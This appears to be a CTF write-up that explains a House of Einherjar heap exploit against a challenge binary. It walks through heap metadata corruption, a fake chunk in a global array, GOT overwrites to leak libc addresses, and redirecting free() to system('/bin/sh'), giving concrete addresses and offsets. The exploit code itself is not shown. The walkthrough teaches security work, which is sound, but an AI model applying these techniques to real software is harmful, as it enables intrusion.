For this challenge created by Uafio, we are given a program and its corresponding source code.
If we run checksec, we can see that NX is enabled, but PIE is disabled and RELRO is only partially enabled.
Therefore, we can perform a GOT overwrite if we’re able to gain a write-what-where primitive and leak the address of system() in libc.
There is an obvious heap overflow vulnerability in choice 4, which allows us to write 0x100 bytes into a heap chunk allocated for a 0x80 byte request.
We can use a technique called “House of Einherjar” to exploit this vulnerability in order to gain a write-what-where primitive.
House of Einherjar Exploit
House of Einherjar is another ptmalloc2 heap exploitation technique that gives us the ability to force malloc() to return an arbitrary pointer.
All it requires, at minimum, is a single off-by-one NULL byte overflow primitive and a heap leak.
The way it works is by leveraging a heap overflow in chunk A to corrupt the prev_size and cur_size fields of the next bordering chunk, chunk B, so that the prev_inuse bit in the cur_size field of chunk B is flipped off, and so that chunk B’s prev_size field is overwritten with a very large value.
This tricks the memory allocator into thinking that chunk B’s previous bordering chunk is free, so that it then attempts to perform a backwards consolidation with it, using the corrupted prev_size field to calculate the beginning of this fake free chunk.
Once the consolidation is complete, and the chunk is placed in the unsorted freelist bin, the next malloc() call should return a pointer to where the memory allocator thinks this newly merged free chunk starts.
This gives us a write-what-where primitive, if we are also allowed to write data that we control into this heap chunk.
Although in this particular program, we are given a very large heap overflow, we can also pull House of Einherjar off if we are just given a single off-by-one null byte overflow into a heap chunk whose size is ideally aligned with 0x100 (plus the 0x1prev_inuse bit).
Regardless of the severity of the heap overflow, House of Einherjar does require a heap leak in order to work!
I will explain why as we go along.
So, with that being said, how do we perform a House of Einherjar exploit?
First we will allocate 3 chunks. Let’s call the first chunk: A, the second chunk: B, the third chunk: C.
Then we will overflow chunk A’s data that we control, into chunk B’s metadata.
Specifically, we will corrupt the prev_size field of chunk B and overwrite it with a large value and corrupt the cur_size field of chunk B by flipping its prev_inuse bit off.
Flipping the prev_inuse bit off will trick the memory allocator into thinking that chunk B’s previous bordering chunk is free.
The large value that we will overwrite the prev_size field with, which should right now be empty as no chunks have been freed yet, is determined by using the following calculation: new_size = chunk_B - target. target is the arbitrary address minus 8 bytes that we would like the next malloc() to return. chunk_B is the address of chunk B on the heap, which is whatmalloc()returns minus 8 bytes. And finally, new_size is just the large value that we will place in the prev_size field.
The astute reader will realize that we need a heap leak in order to make this calculation.
For example, if chunk B’s actual address (not what malloc() returns), is at address 0x8858088 and we want malloc() to return an address within the tmp global array, say, 0x804a0b8, the prev_size of chunk B will be overwritten with 0x8858088 - 0x804a0b0 = 0x80dfd8.
The reason for this calculation is because when a heap chunk is about to be freed, the memory allocator checks to see if either the heap chunk after it or the heap chunk before it are also free.
If the chunk after it is also free, it performs a forward consolidation of the two chunks and places the result in the appropriate freelist.
If, however, it is the chunk before it is that is also free, then a backwards consolidation is performed.
If both A and C are free and then B is freed, both a forward AND backwards consolidation are performed.
The prev_size is used in backwards consolidations to determine where the previous bordering chunk is located.
It will do something like chunk_B - chunk_B->prev_size and the resulting address will be what the memory allocator thinks is the start of the previous free chunk.
By setting this prev_size field to a large value, we can potentially trick the memory allocator into thinking that the previous chunk starts somewhere at a much different address than it should. Perhaps, even in an area in the .BSS segment or the GOT ;)
For this particular program, we will get malloc() to return an address from within the tmp global array.
Then we will write data to this newly malloc’d chunk and overwrite pointers stored in the ptrs global array, which is located immediately after the tmp global array.
This is what the heap looks like before any data is written to chunk A.
And here is what it looks like after:
Notice how we’ve changed chunk B’s cur_size field from 0x89 to 0x88, in order to flip the prev_inuse bit off.
Besides that bit, we still need to preserve the original size field of that chunk, as this size is also used to check whether or not the bordering next chunk is free.
Also note that we have overwritten the prev_size field with 0x80dfd8, using the calculation mentioned before.
In our tmp global buffer, we’ve set up our fake chunk as follows.
Our fake chunk will start at 0x804a0b0. There is no need to set the cur_size field of this fake chunk to anything so we just set it to 0x0.
Our p->fd and p->bk pointers are both set to point back to itself, or 0x0804a0b0, which will allow us to bypass safe unlinking checks, which verify that p->fd->bk = p and p->bk->fd = p.
After we call free() on chunk B, we can observe that it has successfully been backwards consolidated with a fake chunk at address 0x804a0b0.
Notice that the size is now very large: 0x0080e061.
That is because the memory allocator now thinks that this chunk takes up all the memory space from to 0x804a0b0 to 0x8858114.
This is no good and will cause the nextmalloc()to fail due to size checks.
Therefore, we need to edit our tmp global buffer again, but this time, simply to replace the fake chunk size with something much smaller.
A fake chunk size of 0x100 will do.
Of couse, this means that the newline character that comes at the end of our stdin input will corrupt fake_chunk->fd, but that we don’t care about that, as no checks are run on it!
Once we’ve made that change, we observe that our next malloc() call successfully returns 0x804a0b8!
Now that we have successfully forced malloc() to return an arbitrary pointer in the middle of the tmp global, we need to leverage this somehow to get code execution.
Because this is a dynamically linked binary, we already have the system() function loaded into memory from libc.
Also, remember that only partial RELRO is enabled, which allows us to perform a GOT overwrite and force one of the GOT entires to inappropriately call system() while passing in a pointer to the string "/bin/sh\0".
In order to do this though, we first need to get an infoleak in order to get the base address of libc so that we can dynamically resolve the address of system@libc, which changes everytime the process starts, due to ASLR.
If we examine what our .got.plt and .bss sections look like right now, after our House of Einherjar malloc() has finished and the pointer to our newly malloc’d chunk has been placed in the ptr global array, we will see the following.
We can associate the .got.plt entries which start at 0x804a00c, with the following functions.
Let’s take a quick look again at the free code block.
It looks like if we can trash the GOT and overwrite free@got with the address of puts(), we can print out arbitrary data from an pointer we place into the ptrs array. This would give us a read-what-where primitive, and the ability to leak out GOT entries!
Unfortunately, we don’t know the address of puts@libc or puts@got yet, so we can’t overwrite free@got with either of those addresses.
However, we can still get this infoleak to work if we replace the GOT entry for free@got, located at 0x804a010, with the address of puts@plt, or 0x8048490,
Observe that the first instruction of puts@plt is a jmp to puts@got, which will already be populated with the correct puts@libc address.
So, basically we will make *0x804a010 = 0x8048490 and pass in an index into ptrs that we write our desired GOT Table location that we’d like to leak to.
In my final exploit, I could not only overwrite the free@GOT function, because the newline char from our user input would annoyling leak into the lsb of getchar@got, and cause a segfault the next time getchar() was called.
Basically it would turn this:
0xf75ae40a is not the address we want executing when getchar() is called!
So, to get around this issue, I overwrote getchar@got and fgets@got with their corresponding @plt entries +6! Or 0x08048466 and 0x08048476, respectively.
We +6 to the PLT addresses because the first instruction of any .plt address is just a jump to the corresponding function in the got.plt section which would’ve cause an infinite loop.
The astute reader will now point out that the newline char would just move over into the lsb of malloc@got which is correct, but we don’t actually care that malloc@got is now corrupt because we don’t plan on calling malloc() again for the rest of our exploit!
So to put all this together, I wrote the addresses of the GOT entries I wanted to leak into the ptr array, and called the free() function, which now actually calls puts@plt, on each one of the ptr indices.
Ultimately, this is what our .got.plt and .bss sections should look like after everything is correctly setup, but before the free()’s.
Note that 0x08048466 will be overwritten with getchar@libc the next time getchar() or getchar@plt is called. Therefore, we will still be able to leak out getchar@libc.
After all of our free() calls are done, we get the following leaks.
Often times when doing these types of challenges on a remote server, we will not know what libc the challenge is using.
One way to get around this is use a tool like libc-database to look in a database of libc’s.
Another option is to use dynelf.
For my exploit, I just used libc-database and checked my leaks against a local corpus of libc’s that our CTF team, OpenToAll has.
The first command find just looks up our specified name and address in our libc corpus and returns any hits.
In this case, it returned 2 hits, but both libc’s are actually the same, so we can just dump offsets for one of them.
This gives us the offset that system@libc exists from libc_base: 0x40190.
But for us to dynamically calculate system@libc, we still need to know an offset of one of our leaks from libc_base.
Grepping through the libc’s symbols tells us what we need.
It looks like __libc_start_main@libc exists at an offset of 0x1990 from libc_base.
With this information, we now have all we need to dynamically calculate the address of system@libc!
Protip: to update your local libc-database corpus, just run ./get and if a repo fails, just comment it out and try again.
The final step of our exploit will be overwriting a GOT entry to make it call system("/bin/sh\0");.
free@got is, again, a suitable candidate, because it takes in a pointer that we can control in ptrs.
We choose to write the string “/bin/sh” oursevles into ptrs rather than using the “/bin/sh” leak we got from libc-database because the libc offset, 0x160a24 contains a newline char which can be problematic.
So, after the ptrs array is set up, it should look like this:
And free@got entry should now be overwritten with the calculated address of system@libc.
We will finally call free(1) to execute system("/bin/sh\0");!
Putting everything together, we are able to get a shell using the following exploit.